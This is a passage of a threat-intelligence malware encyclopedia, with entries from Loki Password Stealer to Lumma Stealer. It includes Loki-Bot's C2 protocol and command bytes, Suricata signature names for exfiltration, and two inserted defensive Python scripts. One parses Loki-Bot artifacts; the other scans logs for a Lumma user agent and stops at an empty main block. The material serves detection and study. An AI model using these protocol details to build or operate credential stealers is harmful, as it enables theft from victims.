- https://www.theregister.com/2022/03/16/blackberry_lokilocker_ransomware/ - webarchive
- https://blogs.blackberry.com/en/2022/03/lokilocker-ransomware - webarchive
- https://asec.ahnlab.com/en/52570/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Loki Password Stealer (PWS)
"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMe
Loki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.
Loki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.
The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.
Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\C98066\”.
There can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:
File extension | Description |
---|---|
.exe | A copy of the malware that will execute every time the user account is logged into |
.lck | A lock file created when either decrypting Windows Credentials or keylogging, to prevent resource conflicts |
.hdb | A database of hashes for data that has already been exfiltrated to the C2 server |
.kdb | A database of keylogger data that has yet to be sent to the C2 server |
If the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.
The first packet transmitted by Loki-Bot contains application data.
The second packet transmitted by Loki-Bot contains decrypted Windows credentials.
The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.
Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.
The first WORD of the HTTP Payload represents the Loki-Bot version.
The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:
Byte | Payload type |
---|---|
0x26 | Stolen Cryptocurrency Wallet |
0x27 | Stolen Application Data |
0x28 | Get C2 Commands from C2 Server |
0x29 | Stolen File |
0x2A | POS (Point of Sale?) |
0x2B | Keylogger Data |
0x2C | Screenshot |
The 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!
Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.
The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.
Loki-Bot can accept the following instructions from the C2 Server:
Byte | Instruction description |
---|---|
0x00 | Download EXE & Execute |
0x01 | Download DLL & Load #1 |
0x02 | Download DLL & Load #2 |
0x08 | Delete HDB File |
0x09 | Start Keylogger |
0x0A | Mine & Steal Data |
0x0E | Exit Loki-Bot |
0x0F | Upgrade Loki-Bot |
0x10 | Change C2 Polling Frequency |
0x11 | Delete Executables & Exit |
Suricata signatures
Rule SID | Rule name |
---|---|
2024311 | ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected |
2024312 | ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1 |
2024313 | ET TROJAN Loki Bot Request for C2 Commands Detected M1 |
2024314 | ET TROJAN Loki Bot File Exfiltration Detected |
2024315 | ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1 |
2024316 | ET TROJAN Loki Bot Screenshot Exfiltration Detected |
2024317 | ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2 |
2024318 | ET TROJAN Loki Bot Request for C2 Commands Detected M2 |
2024319 | ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2 |
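The following Python script is an added example, not code from this page or from any of the cited Loki-Bot analyses. It reproduces the artifact derivation and payload-header layout described above: it derives the mutex, the hidden %APPDATA% folder and the four file names from a Machine GUID, parses the version and payload-type WORDs of an HTTP payload, and checks whether the Binary ID beginning at the 11th byte is the usual “ckav.ru”. The ASCII encoding of the GUID before hashing, the little-endian byte order of the WORDs and the sample payload bytes are assumptions that the page does not state.

```python
import hashlib
import struct

# Payload types carried in the second WORD of the HTTP payload (from the description above).
PAYLOAD_TYPES = {
    0x26: "Stolen Cryptocurrency Wallet",
    0x27: "Stolen Application Data",
    0x28: "Get C2 Commands from C2 Server",
    0x29: "Stolen File",
    0x2A: "POS",
    0x2B: "Keylogger Data",
    0x2C: "Screenshot",
}

# C2 instruction bytes the bot accepts (from the description above).
C2_COMMANDS = {
    0x00: "Download EXE & Execute",
    0x01: "Download DLL & Load #1",
    0x02: "Download DLL & Load #2",
    0x08: "Delete HDB File",
    0x09: "Start Keylogger",
    0x0A: "Mine & Steal Data",
    0x0E: "Exit Loki-Bot",
    0x0F: "Upgrade Loki-Bot",
    0x10: "Change C2 Polling Frequency",
    0x11: "Delete Executables & Exit",
}

BINARY_ID_OFFSET = 10          # "the 11th byte" in the description, 0-indexed
DEFAULT_BINARY_ID = b"ckav.ru"


def mutex_from_machine_guid(machine_guid: str) -> str:
    """Mutex name: MD5 of the Machine GUID as upper-case hex, trimmed to 24 chars.

    Assumption: the GUID string is hashed as ASCII with no terminator; the page
    only says "MD5 hashing the Machine GUID".
    """
    return hashlib.md5(machine_guid.encode("ascii")).hexdigest().upper()[:24]


def artifacts_from_mutex(mutex: str) -> dict:
    """Derive the on-disk artifacts tied to the mutex.

    Characters 8-13 (1-indexed) name the hidden %APPDATA% folder and
    characters 13-18 name the .exe/.lck/.hdb/.kdb files inside it.
    """
    if len(mutex) != 24:
        raise ValueError("Loki-Bot mutex is expected to be 24 characters")
    folder = mutex[7:13]
    basename = mutex[12:18]
    base_dir = f"%APPDATA%\\{folder}\\"
    return {
        "folder": base_dir,
        "basename": basename,
        "files": [f"{base_dir}{basename}{ext}" for ext in (".exe", ".lck", ".hdb", ".kdb")],
    }


def parse_payload_header(payload: bytes) -> dict:
    """Parse the version/type WORDs and check the Binary ID at offset 10.

    Assumption: WORDs are little-endian (x86 native order). The bytes between
    the type WORD and the Binary ID are left uninterpreted.
    """
    if len(payload) < BINARY_ID_OFFSET + len(DEFAULT_BINARY_ID):
        raise ValueError("payload too short for a Loki-Bot header")
    version, ptype = struct.unpack_from("<HH", payload, 0)
    binary_id_region = payload[BINARY_ID_OFFSET:]
    return {
        "version": version,
        "type": ptype,
        "type_name": PAYLOAD_TYPES.get(ptype, "unknown"),
        "default_binary_id": binary_id_region.startswith(DEFAULT_BINARY_ID),
    }


def describe_c2_command(opcode: int) -> str:
    """Map a C2 instruction byte to its description."""
    return C2_COMMANDS.get(opcode, "unknown")


# Constructed sample payload (not a real capture): version 0x0012, type 0x27,
# six filler bytes, then the default Binary ID.
SAMPLE_PAYLOAD = b"\x12\x00" + b"\x27\x00" + b"\x00" * 6 + b"ckav.ru" + b"\x00"

if __name__ == "__main__":
    print(artifacts_from_mutex("B7E1C2CC98066B250DDB2123"))
    print(parse_payload_header(SAMPLE_PAYLOAD))
```

Run against the mutex from the description, the script yields the folder %APPDATA%\C98066\ and the file base name 6B250D; a payload whose Binary ID region does not start with “ckav.ru” is flagged so it can be noted, as the text advises.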
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Loki Password Stealer (PWS).
Known Synonyms |
---|
Burkina |
Loki |
LokiBot |
LokiPWS |
Internal MISP references
UUID b8fa5036-813f-4887-b4d4-bb17b4a7eba0
which can be used as unique global reference for Loki Password Stealer (PWS)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws - webarchive
- https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html - webarchive
- https://news.sophos.com/en-us/2020/05/14/raticate/ - webarchive
- http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html - webarchive
- http://reversing.fun/reversing/2021/06/08/lokibot.html - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/02/lokibot-dissecting-cc-panel-deployments/ - webarchive
- https://securityintelligence.com/x-force/spam-trends-campaigns-senior-superlatives-2023/ - webarchive
- https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/spammed-png-file-hides-lokibot/ - webarchive
- https://securityintelligence.com/posts/roboski-global-recovery-automation/ - webarchive
- https://medium.com/@paul.k.burbage/the-tale-of-the-pija-droid-firefinch-4d304fde5ca2 - webarchive
- https://www.youtube.com/watch?v=N0wAh26wShE - webarchive
- https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/ - webarchive
- https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/ - webarchive
- https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/ - webarchive
- https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html - webarchive
- https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html - webarchive
- https://www.ciphertechsolutions.com/roboski-global-recovery-automation/ - webarchive
- https://clickallthethings.wordpress.com/2020/03/31/lokibot-getting-equation-editor-shellcode/ - webarchive
- https://malcat.fr/blog/statically-unpacking-a-simple-net-dropper/ - webarchive
- https://www.youtube.com/watch?v=-FxyzuRv6Wg - webarchive
- https://github.com/R3MRUM/loki-parse - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam-part-2/ - webarchive
- https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850 - webarchive
- https://isc.sans.edu/diary/24372 - webarchive
- https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf - webarchive
- https://www.logpoint.com/en/blog/hiding-in-plain-sight-the-subtle-art-of-loki-malwares-obfuscation/ - webarchive
- https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf - webarchive
- https://www.atomicmatryoshka.com/post/malware-headliners-lokibot - webarchive
- https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html - webarchive
- https://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html - webarchive
- https://securelist.com/loki-bot-stealing-corporate-passwords/87595/ - webarchive
- https://www.youtube.com/watch?v=K3Yxu_9OUxU - webarchive
- https://lab52.io/blog/a-twisted-malware-infection-chain/ - webarchive
- https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord - webarchive
- https://ivanvza.github.io/posts/lokibot_analysis - webarchive
- https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/ - webarchive
- https://www.fortinet.com/blog/threat-research/lokibot-targets-microsoft-office-document-using-vulnerabilities-and-macros - webarchive
- https://www.infoblox.com/wp-content/uploads/infoblox-whitepaper-deep-analysis-of-a-recent-lokibot-attack.pdf - webarchive
- https://cybergeeks.tech/how-to-expose-a-potential-cybercriminal-due-to-misconfigurations/ - webarchive
- https://marcoramilli.com/2019/10/28/sweed-targeting-precision-engineering-companies-in-italy/ - webarchive
- https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/ - webarchive
- https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/ - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://isc.sans.edu/diary/27282 - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/loki-info-stealer-propagates-through-lzh-files - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads - webarchive
- http://reversing.fun/posts/2021/06/08/lokibot.html - webarchive
- https://phishme.com/loki-bot-malware/ - webarchive
- https://www.lastline.com/blog/password-stealing-malware-loki-bot/ - webarchive
- http://www.malware-traffic-analysis.net/2017/06/12/index.html - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter - webarchive
- https://cybergeeks.tech/how-to-expose-a-potential-cybercriminal-due-to-misconfigurations - webarchive
- https://malcat.fr/blog/reversing-a-nsis-dropper-using-quick-and-dirty-shellcode-emulation/ - webarchive
- https://www.lac.co.jp/lacwatch/report/20220307_002893.html - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
- https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lokorrito
According to ESET, this is a banking trojan that was active mainly in Mexico until the beginning of 2020, with builds for Brazil, Chile, and Colombia also having been identified.
Internal MISP references
UUID 5e8f3d59-15bc-492c-afdb-4b71e0417142
which can be used as unique global reference for Lokorrito
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LOLSnif
Internal MISP references
UUID 397bfb34-5643-4d21-a5b1-6950750fb89f
which can be used as unique global reference for LOLSnif
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lolsnif - webarchive
- https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/ - webarchive
- https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/ - webarchive
- https://medium.com/@vishal_thakur/lolsnif-malware-e6cb2e731e63 - webarchive
- https://www.telekom.com/en/blog/group/article/lolsnif-tracking-another-ursnif-based-targeted-campaign-600062 - webarchive
- https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LONGWATCH
The primary function of LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Windows temp folder.
Internal MISP references
UUID 08106bd2-975b-421c-8794-366452fb0109
which can be used as unique global reference for LONGWATCH
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.longwatch - webarchive
- https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae - webarchive
- https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
looChiper
LooChiper is a ransomware. It uses a nice but scary name: LooCipher. The name is at the same time an allusion to its capabilities (thanks to the term “Cipher”) and to the popular mythological figure, Lucifer. Despite its evocative nickname, the functionality of this malware is pretty straightforward, not very different from that of many other ransomware families.
Internal MISP references
UUID 4b83ba50-7d50-48b4-bb70-fcbcacd23340
which can be used as unique global reference for looChiper
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lookback
Internal MISP references
UUID bb038b04-622b-4df6-b867-601284e8da0e
which can be used as unique global reference for Lookback
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lookback - webarchive
- https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/ - webarchive
- https://nao-sec.org/2021/01/royal-road-redive.html - webarchive
- https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new - webarchive
- https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks - webarchive
- https://threatgen.com/taking-a-closer-look-at-the-lookback-malware-campaign-part-1/ - webarchive
- https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf - webarchive
- https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals - webarchive
- https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
L0rdix
L0rdix is a multipurpose .NET remote access tool (RAT) first discovered being sold on underground forums in November 2018. Out of the box, L0rdix supports eight commands, although custom commands can be defined and added. These include:
- Download and execute
- Update
- Open page (visible)
- Open page (invisible)
- Cmd
- Kill process
- Upload file
- HTTP Flood
L0rdix can extract credentials from common web browsers and steal data from crypto wallets and a target's clipboard. Optionally, L0rdix can deploy a cryptominer (XMRig) to its bots.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular L0rdix.
Known Synonyms |
---|
lordix |
Internal MISP references
UUID fa61a690-fd9c-4036-97fb-bf3674aa60b2
which can be used as unique global reference for L0rdix
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lordix - webarchive
- https://blog.ensilo.com/l0rdix-attack-tool - webarchive
- https://www.bromium.com/decrypting-l0rdix-rats-c2/ - webarchive
- https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/decrypt_l0rdix_c2.py - webarchive
- https://twitter.com/hexlax/status/1058356670835908610 - webarchive
- https://www.bromium.com/an-analysis-of-l0rdix-rat-panel-and-builder/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lorenz
Tesorion describes Lorenz as a ransomware with design and implementation flaws that make decryption with the tools provided by the attackers impossible. A free decryptor for the 2021 versions was made available via the NoMoreRansom initiative. A new version of the malware was discovered in March 2022, for which a free decryptor was again provided, while the ransomware operators themselves are unable to supply tools that decrypt affected files.
Internal MISP references
UUID 3ec79052-d8c0-49b2-9204-42f9d8f035f8
which can be used as unique global reference for Lorenz
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lorenz - webarchive
- https://therecord.media/free-decrypter-available-for-lorenz-ransomware/ - webarchive
- https://www.tesorion.nl/en/posts/lorenz-ransomware-analysis-and-a-free-decryptor/ - webarchive
- https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/ - webarchive
- https://arcticwolf.com/resources/blog/lorenz-ransomware-getting-dumped/ - webarchive
- https://www.tesorion.nl/en/posts/lorenz-ransomware-rebound-corruption-and-irrecoverable-files/ - webarchive
- https://www.bleepingcomputer.com/news/security/meet-lorenz-a-new-ransomware-gang-targeting-the-enterprise/ - webarchive
- https://twitter.com/AltShiftPrtScn/status/1423190900516302860?s=20 - webarchive
- https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Loup
Frank Boldewin describes Loup as a small cli-tool to cash out NCR devices (ATM).
Internal MISP references
UUID 8ab39736-68f4-4b51-9b48-7034da1cac71
which can be used as unique global reference for Loup
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LoupeLoader
Internal MISP references
UUID 163370d5-7fea-49ad-b511-9e6701e4eec8
which can be used as unique global reference for LoupeLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LOWBALL
LOWBALL uses the legitimate Dropbox cloud-storage service as its C&C server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.
Internal MISP references
UUID 484b9fd9-76c6-41af-a85b-189b0fc94909
which can be used as unique global reference for LOWBALL
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball - webarchive
- https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/ - webarchive
- https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html - webarchive
- https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LOWKEY
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LOWKEY.
Known Synonyms |
---|
PortReuse |
Internal MISP references
UUID 515d1318-c3b1-4d40-a321-31b3baf75414
which can be used as unique global reference for LOWKEY
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lowkey - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html - webarchive
- https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/ - webarchive
- https://www.mandiant.com/resources/apt41-us-state-governments - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LOWZERO
Internal MISP references
UUID 1efd4902-ff9e-4e71-8867-6eddb9bc456c
which can be used as unique global reference for LOWZERO
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LPEClient
LPEClient is an HTTP(S) downloader that expects two command line parameters: an encrypted string containing two URLs (a primary and a secondary C&C server), and the path on the victim's file system to store the downloaded payload.
It sends detailed information about the victim's environment, like computer name, type and number of processors, computer manufacturer, product name, major and minor Windows versions, architecture, memory information, installed security software and the version of the ntoskrnl.exe from its version-information resource.
LPEClient uses specific 32-bit values to represent its execution state (0x59863F09 when connecting via the WinHTTP interface, 0xA9348B57 via WinINet), or the nature of HTTP requests to the C&C servers (0xF07D6B34 when sending system information, 0xEF8C0D51 when requesting a DLL payload, 0xCB790A25 when reporting the successful loading of the DLL, 0xD7B20A96 when reporting the state of the DLL execution). As the final step, the malware looks for the export CloseEnv and executes it.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LPEClient.
Known Synonyms |
---|
LPEClientTea |
Internal MISP references
UUID 754c8f79-743b-49fc-971e-bcd60edef9d8
which can be used as unique global reference for LPEClient
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lpeclient - webarchive
- https://securelist.com/unveiling-lazarus-new-campaign/110888/ - webarchive
- https://securelist.com/the-lazarus-group-deathnote-campaign/109490/ - webarchive
- https://vblocalhost.com/uploads/VB2021-Lee-etal.pdf - webarchive
- https://securelist.com/lazarus-threatneedle/100803/ - webarchive
- https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf - webarchive
- https://vblocalhost.com/uploads/VB2021-Park.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
lsassDumper
This malware, written in Go, is an LSASS process memory dumper that was custom developed by the threat actors according to Security Joes. It has the capability to automatically exfiltrate the results to the free file transfer service "transfer.sh".
Internal MISP references
UUID f6e9f1f3-91ba-40af-aa2d-d0d5e824b791
which can be used as unique global reference for lsassDumper
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lu0Bot
According to PCrisk, Lu0bot is malicious software. The malware is lightweight, so its use of system resources is low. This complicates the detection of Lu0bot, since it does not cause noticeable symptoms such as a severe drop in system performance.
The malicious program functions as a telemetry collector.
Internal MISP references
UUID d81c068d-7420-40ee-ab50-5f29b2ccc314
which can be used as unique global reference for Lu0Bot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LuaDream
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LuaDream.
Known Synonyms |
---|
DreamLand |
Internal MISP references
UUID a6fee19a-21e4-4e2c-9c1f-a38d0732f661
which can be used as unique global reference for LuaDream
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.luadream - webarchive
- https://www.sentinelone.com/labs/sandman-apt-china-based-adversaries-embrace-lua/ - webarchive
- https://www.sentinelone.com/labs/sandman-apt-a-mystery-group-targeting-telcos-with-a-luajit-toolkit/ - webarchive
- https://r136a1.dev/2023/09/22/more-on-dreamland/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Luca Stealer
According to PCRisk, The Luca stealer can extract a variety of information from compromised machines. It targets data related to the following: operating system, device name, CPUs, desktop environment, network interface, user account name, preferred system language, running processes, etc.
This malicious program can steal information from over thirty Chromium-based browsers. From these applications, Luca can obtain Internet cookies, account log-in credentials (usernames/passwords), and credit card numbers. Additionally, the stealer can extract data from password manager and cryptowallet browser extensions compatible with over twenty browsers.
This malware also targets various messaging applications like Telegram, Discord, ICQ, Skype, Element, etc. It likewise aims to acquire information from gaming-related software such as Steam and Uplay (Ubisoft Connect). Furthermore, some versions of Luca can take screenshots and download the files stored on victims' devices.
Internal MISP references
UUID e9693255-762b-447a-9dfa-2ea1a35fe39c
which can be used as unique global reference for Luca Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lucifer
Internal MISP references
UUID 54093130-035f-4f2c-b98c-a660156fbbda
which can be used as unique global reference for Lucifer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lumar
This family was previously tracked as PovertyStealer until its actual name was identified via crime forums.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lumar.
Known Synonyms |
---|
PovertyStealer |
Internal MISP references
UUID f783ca5b-2c4e-479d-9af7-d0abd1eeeaff
which can be used as unique global reference for Lumar
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Luminosity RAT
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Luminosity RAT.
Known Synonyms |
---|
LuminosityLink |
Internal MISP references
UUID e145863e-f3bd-489c-91f6-0c2b7e9cc59a
which can be used as unique global reference for Luminosity RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat - webarchive
- https://www.secureworks.com/research/threat-profiles/copper-fieldstone - webarchive
- https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/ - webarchive
- https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/ - webarchive
- http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html - webarchive
- https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf - webarchive
- https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark - webarchive
- https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lumma Stealer
Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
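The user agent string above is the one concrete network indicator the description gives, so the natural first check is to run it over proxy or web-server logs. The following is an added example (not code from the page, from the stealer, or from any of the cited reports); it assumes a combined-log-style line layout with the user agent as the last quoted field, and the sample lines are constructed, not captured traffic. POSTs are separated from other methods because the description ties exfiltration specifically to HTTP POST.

```python
"""Flag HTTP requests carrying the Lumma Stealer exfiltration user agent.

Added example; not code from the original page or from any vendor report.
Log format is an assumption: one request per line in a combined-log
layout with the user agent in double quotes as the last field.
"""
import re
from dataclasses import dataclass

# Indicator taken from the description above.
LUMMA_USER_AGENTS = ("TeslaBrowser/5.5",)

# Assumed layout:
# <client> - - [<ts>] "<method> <url> <proto>" <status> <bytes> "<referer>" "<user-agent>"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]+" (?P<status>\d{3}) (?P<bytes>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


@dataclass(frozen=True)
class Hit:
    client: str
    ts: str
    url: str
    user_agent: str


def scan_log(lines, indicators=LUMMA_USER_AGENTS):
    """Return (posts, others): requests whose user agent matches an indicator.

    POSTs go in the first list because the description ties exfiltration to
    HTTP POST; any other method with the same UA is still surfaced in the
    second list rather than dropped.
    """
    posts, others = [], []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:  # unparsable line: skip it, do not crash the whole scan
            continue
        ua = m.group("ua")
        if not any(ind in ua for ind in indicators):
            continue
        rec = Hit(m.group("client"), m.group("ts"), m.group("url"), ua)
        (posts if m.group("method") == "POST" else others).append(rec)
    return posts, others


# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.12 - - [07/Mar/2024:10:14:22 +0000] "POST /api HTTP/1.1" 200 5123 "-" "TeslaBrowser/5.5"',
    '10.0.0.12 - - [07/Mar/2024:10:14:30 +0000] "GET /c2/config HTTP/1.1" 200 88 "-" "TeslaBrowser/5.5"',
    '10.0.0.40 - - [07/Mar/2024:10:15:01 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/123.0"',
    "garbage line that does not parse",
]

if __name__ == "__main__":
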